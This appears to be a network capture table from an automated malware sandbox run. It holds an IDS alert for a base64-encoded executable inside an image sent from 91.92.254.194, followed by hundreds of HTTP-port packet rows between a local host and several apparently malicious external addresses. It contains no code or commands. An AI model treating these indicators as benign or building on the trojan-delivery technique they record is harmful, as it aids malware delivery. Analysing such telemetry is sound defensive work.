                        07/03/24-18:03:45.506573TCP2047750ET TROJAN Base64 Encoded MZ In Image804917191.92.254.194192.168.2.22
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 3, 2024 18:03:26.151053905 CEST4916580192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:26.156032085 CEST8049165192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:26.156150103 CEST4916580192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:26.156271935 CEST4916580192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:26.161662102 CEST8049165192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:26.746568918 CEST8049165192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:26.746742964 CEST4916580192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:26.757945061 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:26.762902021 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:26.762989044 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:26.763056993 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:26.767810106 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269331932 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269356012 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269366980 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269568920 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.269629955 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269640923 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269646883 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269651890 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269701958 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.269771099 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269788027 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269798040 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.269825935 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.269856930 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.276210070 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.276217937 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.276268959 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.276281118 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.276285887 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.276302099 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.276313066 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.361711979 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.361752987 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.361766100 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.361840963 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.361860037 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.361903906 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.366457939 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.366470098 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.366523027 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.366817951 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.366831064 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.366844893 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.366866112 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.366878033 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.371248960 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.371267080 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.371340036 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.371545076 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.371561050 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.371573925 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.371592045 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.371627092 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.376089096 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.376102924 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.376142025 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.376235962 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.376281023 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.376353025 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.376400948 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.380856037 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.380870104 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.380927086 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.381186008 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.381197929 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.381206989 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.381232023 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.381272078 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.385699034 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.385713100 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.385772943 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.454265118 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.454289913 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.454297066 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.454339027 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.454363108 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.454401016 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.458940983 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.458954096 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.459014893 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.459160089 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.459172964 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.459203959 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.459214926 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.463671923 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.463685989 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.463737965 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.464030981 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.464051962 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.464062929 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.464085102 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.464097023 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.468534946 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.468549013 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.468601942 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.468748093 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.468759060 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.468795061 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.473267078 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.473283052 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.473330021 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.473623037 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.473634958 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.473670006 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.478148937 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.478167057 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.478177071 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.478228092 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.478281021 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.478475094 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.478487015 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.478533030 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.482955933 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.482969046 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.482985020 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.482995987 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.483006001 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.483014107 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.483017921 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.483023882 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.483028889 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.483042002 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.483042955 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.483052969 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.483071089 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.483078957 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.660904884 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.660949945 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.894342899 CEST8049166198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:27.894439936 CEST4916680192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:27.910646915 CEST4916780192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:27.915724993 CEST8049167192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:27.915807962 CEST4916780192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:27.916109085 CEST4916780192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:27.921144009 CEST8049167192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:28.485985994 CEST8049167192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:28.486042976 CEST4916780192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:28.508555889 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:28.516813040 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:28.516880989 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:28.517102957 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:28.522826910 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002759933 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002778053 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002787113 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002794027 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002799034 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002809048 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002931118 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.002962112 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002973080 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002984047 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002995968 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.002999067 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.003019094 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.003037930 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.007767916 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.007807970 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.007817984 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.007823944 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.007853031 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.007875919 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.008158922 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.008197069 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.010581017 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.089554071 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.089589119 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.089600086 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.089624882 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.089669943 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.089734077 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.089767933 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.089776993 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.089787006 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.089813948 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.089829922 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.090687990 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.090698957 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.090709925 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.090720892 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.090737104 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.090749979 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.090943098 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.090954065 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.090987921 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.091278076 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.091289043 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.091312885 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.091326952 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.091458082 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.091469049 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.091480017 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.091530085 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.092252016 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.092262983 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.092273951 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.092294931 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.092312098 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.092394114 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.092403889 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.092425108 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.092439890 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.093170881 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.093246937 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.093295097 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.093324900 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.094398975 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.094444036 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176326990 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176347971 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176359892 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176424026 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176434994 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176440954 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176446915 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176480055 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176480055 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176662922 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176673889 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176685095 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176696062 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176697016 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176709890 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176726103 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176820993 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176852942 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176903009 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176913977 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.176934004 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.176945925 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177061081 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177073002 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177103043 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177258015 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177268982 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177279949 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177290916 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177295923 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177300930 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177310944 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177328110 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177666903 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177679062 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177695036 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177711964 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177725077 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177761078 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177795887 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177851915 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177861929 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177891016 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.177967072 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177978039 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177989006 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.177999020 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178011894 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178025007 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178251028 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178293943 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178340912 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178352118 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178361893 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178373098 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178378105 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178384066 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178390026 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178395033 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178405046 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178409100 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178420067 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178436995 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.178981066 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.178993940 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179004908 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179020882 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.179033995 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.179116011 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179126978 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179136992 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179147959 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179148912 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.179162979 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.179177046 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:29.179428101 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179440975 CEST8049168198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:29.179467916 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:30.807286024 CEST4916880192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:30.807365894 CEST4916780192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:31.747714996 CEST8049165192.185.89.92192.168.2.22
                        Jul 3, 2024 18:03:31.748234987 CEST4916580192.168.2.22192.185.89.92
                        Jul 3, 2024 18:03:35.344374895 CEST4916980192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:35.350212097 CEST8049169198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:35.350279093 CEST4916980192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:35.350399971 CEST4916980192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:35.356754065 CEST8049169198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:35.841720104 CEST8049169198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:35.841739893 CEST8049169198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:35.841749907 CEST8049169198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:35.841761112 CEST8049169198.46.178.144192.168.2.22
                        Jul 3, 2024 18:03:35.841831923 CEST4916980192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:35.842516899 CEST4916980192.168.2.22198.46.178.144
                        Jul 3, 2024 18:03:39.113735914 CEST4917080192.168.2.2294.156.65.247
                        Jul 3, 2024 18:03:39.118707895 CEST804917094.156.65.247192.168.2.22
                        Jul 3, 2024 18:03:39.118787050 CEST4917080192.168.2.2294.156.65.247
                        Jul 3, 2024 18:03:39.119570971 CEST4917080192.168.2.2294.156.65.247
                        Jul 3, 2024 18:03:39.124324083 CEST804917094.156.65.247192.168.2.22
                        Jul 3, 2024 18:03:39.758742094 CEST804917094.156.65.247192.168.2.22
                        Jul 3, 2024 18:03:39.758760929 CEST804917094.156.65.247192.168.2.22
                        Jul 3, 2024 18:03:39.758939981 CEST4917080192.168.2.2294.156.65.247
                        Jul 3, 2024 18:03:40.906754971 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:40.911729097 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:40.911787033 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:40.912023067 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:40.916804075 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.532833099 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.532856941 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.532869101 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.532892942 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.532928944 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.532941103 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.532968044 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.612917900 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.612955093 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.612967014 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.613054037 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.613109112 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.613110065 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.613152981 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.613209963 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.613274097 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.613380909 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.613430977 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.622756958 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.622785091 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.622797012 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.622826099 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.692051888 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.692086935 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.692099094 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.692126989 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.692168951 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.692204952 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.692218065 CEST804917191.92.254.194192.168.2.22
                        Jul 3, 2024 18:03:41.692261934 CEST4917180192.168.2.2291.92.254.194
                        Jul 3, 2024 18:03:41.692384958 CEST804917191.92.254.194192.168.2.22
